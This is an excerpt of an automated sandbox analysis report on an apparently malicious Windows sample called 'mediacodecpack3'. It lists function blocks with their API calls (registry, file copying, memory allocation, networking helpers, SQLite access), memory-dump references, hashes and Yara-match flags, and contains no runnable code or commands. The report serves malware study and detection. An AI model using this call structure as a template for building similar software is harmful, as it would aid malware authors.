                                                                                            • Instruction Fuzzy Hash: B7F0B471A043108FCB109F24D410B5ABBE5EF0A374F4488ADED9997381DB70AC00CB91
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                            • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                              • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2507506473-0
                                                                                            • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                            • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9511E
                                                                                              • Part of subcall function 02B93D7E: htons.WS2_32(?), ref: 02B93DA2
                                                                                              • Part of subcall function 02B93D7E: htonl.WS2_32(00000000), ref: 02B93DB9
                                                                                              • Part of subcall function 02B93D7E: htonl.WS2_32(00000000), ref: 02B93DC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonl$H_prologhtons
                                                                                            • String ID:
                                                                                            • API String ID: 4039807196-0
                                                                                            • Opcode ID: 930b490073ccfd9ff733ea50792e59a2cd8a98da46c1e1db495ddd2b01427ab5
                                                                                            • Instruction ID: 62e96f9926daf0e20897fc4ceba717a140237f159ac2b4bbcc2bce963b57a09d
                                                                                            • Opcode Fuzzy Hash: 930b490073ccfd9ff733ea50792e59a2cd8a98da46c1e1db495ddd2b01427ab5
                                                                                            • Instruction Fuzzy Hash: 2B8148B1D0424E8ECF16DFA8D190AEEBBB5EF48314F1481AAD851B7240EB765A45CF70
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D9CA
                                                                                              • Part of subcall function 02B91A01: TlsGetValue.KERNEL32 ref: 02B91A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 34f4d30c9555b5a8703f0e21a72a83d5f0ca13b05f089ac003bfe29edd11c18e
                                                                                            • Instruction ID: fc99999d1c705fa88b001ac8d77919b7c544772a0d403522420f7c0a763f9788
                                                                                            • Opcode Fuzzy Hash: 34f4d30c9555b5a8703f0e21a72a83d5f0ca13b05f089ac003bfe29edd11c18e
                                                                                            • Instruction Fuzzy Hash: CA2132B190420AAFDF04DFA9D440AFEBBF9EF49314F1041AEE915E7240D771A910CBA1
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02BCC5AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 2d145bd48dfcade9531d59655a458408fc6c5bc9404775150100288841eeeafd
                                                                                            • Instruction ID: b1cb271ff99689142053d72e58b853349b200323095c15ef318187aab8025e79
                                                                                            • Opcode Fuzzy Hash: 2d145bd48dfcade9531d59655a458408fc6c5bc9404775150100288841eeeafd
                                                                                            • Instruction Fuzzy Hash: 34113AF250C504EFE705AE09EC81BBEBBE9EB94760F16482DE2C9C7310E63198518B56
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D55A
                                                                                              • Part of subcall function 02B926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02B92706
                                                                                              • Part of subcall function 02B926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02B9272B
                                                                                              • Part of subcall function 02B926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BB3173), ref: 02B92738
                                                                                              • Part of subcall function 02B926DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02B92778
                                                                                              • Part of subcall function 02B926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02B927D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: 8dae16b8e202e82bb964299e8bcd6da9c8ab51d3ce59b303d2e094b2c42c4c6c
                                                                                            • Instruction ID: 4fe51c390cda420f7755bb7ce3ce605de0441e0cc4988817bae8f0e1a7e71885
                                                                                            • Opcode Fuzzy Hash: 8dae16b8e202e82bb964299e8bcd6da9c8ab51d3ce59b303d2e094b2c42c4c6c
                                                                                            • Instruction Fuzzy Hash: 06019EB1900B089FC329CF5AC540996FBE5FF88314B15C5EE98599B722E7B19A40CF94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction ID: 93b9b1974ed41d96b605e6f2543649dec7ed103e9ca7e63d5c00ca61ae8303bf
                                                                                            • Opcode Fuzzy Hash: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction Fuzzy Hash: C701EF71E10219CFDB08DF98D8A1AEDB3B1FB09300F55856AE452B72A0C738A848CB15
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D339
                                                                                              • Part of subcall function 02BA27C5: _malloc.LIBCMT ref: 02BA27DD
                                                                                              • Part of subcall function 02B9D555: __EH_prolog.LIBCMT ref: 02B9D55A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: bd29dd3f3d99c9a3e523deb9be6e8557face9a968983088db49fe2bd96a2f9d5
                                                                                            • Instruction ID: a37f0f47690082d3a1cdb3d99c46fc0d4f2eaea0669615c2233061f5cae30bd2
                                                                                            • Opcode Fuzzy Hash: bd29dd3f3d99c9a3e523deb9be6e8557face9a968983088db49fe2bd96a2f9d5
                                                                                            • Instruction Fuzzy Hash: 0FE08C71A0410AABEF1AEF68981177D77A2EF44701F0085EEA809A2240EBB18A008A10
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction ID: ad16e0f938f8472db79b29402d126077d4e772f8cfe65a76779df96d21c81dee
                                                                                            • Opcode Fuzzy Hash: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction Fuzzy Hash: 3AD0A7B548800EBDD708C6419D89EE9239CD708719F2000BB7249F30D0DE3849595A3D
                                                                                            APIs
                                                                                              • Part of subcall function 02BA48CA: __getptd_noexit.LIBCMT ref: 02BA48CB
                                                                                              • Part of subcall function 02BA48CA: __amsg_exit.LIBCMT ref: 02BA48D8
                                                                                              • Part of subcall function 02BA24A3: __getptd_noexit.LIBCMT ref: 02BA24A7
                                                                                              • Part of subcall function 02BA24A3: __freeptd.LIBCMT ref: 02BA24C1
                                                                                              • Part of subcall function 02BA24A3: RtlExitUserThread.NTDLL(?,00000000,?,02BA2483,00000000), ref: 02BA24CA
                                                                                            • __XcptFilter.LIBCMT ref: 02BA248F
                                                                                              • Part of subcall function 02BA7954: __getptd_noexit.LIBCMT ref: 02BA7958
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: a7f65cb7445cccd64b7e944dca60e35566b8b57b34df754d540d7f2c83ca3b57
                                                                                            • Instruction ID: 5c28841a46ab2da66ff95157adad677bc0109b2659524fead2091257b5bd473a
                                                                                            • Opcode Fuzzy Hash: a7f65cb7445cccd64b7e944dca60e35566b8b57b34df754d540d7f2c83ca3b57
                                                                                            • Instruction Fuzzy Hash: A7E0ECB1D48604AFEB08EBA0D959F7E7776AF44311F2001C9F1019B2B0DEB4A944EE20
                                                                                            APIs
                                                                                            • RegQueryValueExA.KERNELBASE(?), ref: 0040D57B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction ID: 26b46432db68fc4713545f90ca74021cbfbc64d50c18903c1266e08affe4bc0b
                                                                                            • Opcode Fuzzy Hash: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction Fuzzy Hash: 1BB092B0D48506EBCB014FA09D04A6DBA71BF44350722483A88A2B1160D7744105AA5A
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE ref: 00401E96
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 4241100979-0
                                                                                            • Opcode ID: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction ID: ac672658b327ef22b57dd8096845a6f62d9f9dd2f6b21eb8d4679538076b0d83
                                                                                            • Opcode Fuzzy Hash: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction Fuzzy Hash: 61A02220888330FBC0300AB00F0C8283008080838033200333A8B300C088FE080B2B8F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction ID: caaeb3edd0182b104b1465d8a7214e334b93cb3688170f1009fa56cc25eb67fe
                                                                                            • Opcode Fuzzy Hash: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction Fuzzy Hash: D3A00221954A01AAE1407BB2EB0AB383910A725706F15417B7296790E18E79014A595F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction ID: 13d0081663d5c949863e01e780637134611a7a95a1637e4bbe86339b43f74999
                                                                                            • Opcode Fuzzy Hash: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction Fuzzy Hash: E1900220604101AFD2000B225F4861536A45505B4171A483D5447E0064DA3980496519
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction ID: 578dd1ffac1f8e1011a1a5834bce6420265c4f34c8c97087b967ba0ca0ba6dfb
                                                                                            • Opcode Fuzzy Hash: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction Fuzzy Hash: 20900220604101DAE2040A725A082192654660464571149395447E0150DA3580095D29
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: d1371eba775403ce0a0b3a5e275b370c9632e350e192473b9c527866ef07340d
                                                                                            • Instruction ID: a8bf00e64f7e2993b61d62b4b8e680599bab041d86bcc135e3b8de31f6ebbcc7
                                                                                            • Opcode Fuzzy Hash: d1371eba775403ce0a0b3a5e275b370c9632e350e192473b9c527866ef07340d
                                                                                            • Instruction Fuzzy Hash: 4151BEF26086009FE7096E19DCD57BEF7E9EF98724F16092EE6C583340EA3558408A97
                                                                                            APIs
                                                                                              • Part of subcall function 02BA0620: OpenEventA.KERNEL32(00100002,00000000,00000000,F874DD5C), ref: 02BA06C0
                                                                                              • Part of subcall function 02BA0620: CloseHandle.KERNEL32(00000000), ref: 02BA06D5
                                                                                              • Part of subcall function 02BA0620: ResetEvent.KERNEL32(00000000,F874DD5C), ref: 02BA06DF
                                                                                              • Part of subcall function 02BA0620: CloseHandle.KERNEL32(00000000,F874DD5C), ref: 02BA0714
                                                                                            • TlsSetValue.KERNEL32(0000002B,?), ref: 02BA11BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                            • String ID:
                                                                                            • API String ID: 1556185888-0
                                                                                            • Opcode ID: c8e0c6da93fcd2f75b905ebcbfed86c447ddb8e207f058bcb9fa02fdc5c1b2ad
                                                                                            • Instruction ID: 84511779c74fa3976e78aef45674c3baf6c19de94d6f8ed8e76b1aeab46751a1
                                                                                            • Opcode Fuzzy Hash: c8e0c6da93fcd2f75b905ebcbfed86c447ddb8e207f058bcb9fa02fdc5c1b2ad
                                                                                            • Instruction Fuzzy Hash: D5018F71A44204AFD710DF5DDC55B5ABBB8EB096B1F104AAAF829E3380D771A9008AA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSleepStartup
                                                                                            • String ID:
                                                                                            • API String ID: 3346105675-0
                                                                                            • Opcode ID: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction ID: 9a29c4e619f7a4d8ed8324ebca556abd9c53da00443e6c512cbb7d8c9fa3b2b6
                                                                                            • Opcode Fuzzy Hash: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction Fuzzy Hash: 8FE08670C06245C6D724CEDC97243AAB3306748306F680137D107762D9C23D8D4EDA1F
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 0040184D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction ID: 3b235d091506e9fd49973954eb1e1228e6c7b9fea26647d7565d0fb406e94443
                                                                                            • Opcode Fuzzy Hash: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction Fuzzy Hash: 16D01271849504DFDF084FF4CA48ADDBF30BB10701F110466E906BA1A1CB7CD947AB05
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040D1CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction ID: fcb18d1d78468dbf9f57a7137ce4b137392d6aea0d2686bddcdc2e81c808b1ca
                                                                                            • Opcode Fuzzy Hash: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction Fuzzy Hash: 20B09234955B409BE28267A08AC96BC7760AB54300F601522AA12A91C08E785A47A50B
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                            • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                            • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                            • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                            • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                            • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                            • memcmp.MSVCRT ref: 60967D4C
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                            • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                            • sqlite3_free.SQLITE3 ref: 60968002
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                              • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                              • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                            • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                            • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                            • sqlite3_step.SQLITE3 ref: 60968139
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                            • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                              • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                              • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                              • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                            • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                            • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                            • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                            • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                            • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                            • sqlite3_free.SQLITE3 ref: 60969102
                                                                                            • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: $d
                                                                                            • API String ID: 2451604321-2084297493
